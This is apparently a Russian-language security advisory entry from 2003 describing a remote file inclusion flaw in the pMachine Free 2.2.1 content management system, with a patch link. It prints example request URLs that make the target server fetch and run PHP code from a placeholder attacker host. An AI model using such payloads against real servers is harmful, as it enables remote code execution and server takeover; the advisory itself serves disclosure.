Дата публикации: | 18.06.2003 |
Всего просмотров: | 1881 |
Опасность: | |
Наличие исправления: | |
Количество уязвимостей: | 1 |
CVE ID: | Нет данных |
Вектор эксплуатации: | |
Воздействие: | |
CWE ID: | Нет данных |
Наличие эксплоита: | Нет данных |
Уязвимые продукты: | |
Описание: | Уязвимость включения файла обнаружена в системе управления содержанием
pMachine. Удаленный пользователь может выполнить произвольные команды на целевой системе.
Сообщается, что недостаток в сценарии 'pm/inc.lib.php' позволяет удаленному пользователю определить удаленное местоположение для переменной $pm_path, чтобы заставить сервер включить файл в удаленном местоположении. PHP код в файле, Включая команды операционной системы, будут выполнены на целевом сервере с привилегиями целевого Web сервера. Пример: http://[target]/pm/lib.inc.php?pm_path=htt p://[attacker]/&sfx=.txt with: http://[attacker]/config.txt http://[target]/pm/lib.inc.php?pm_path=http://[attacker]/&sfx=/badcode.txt with: http://[attacker]/conf ig/badcode.txtУязвимость обнаружена в pMachine Free 2.2.1 Неофициальный патч опубликован на сайте http://www.phpsecure.info
|
Ссылки: | pMachine (PHP) : Include() Security Hole |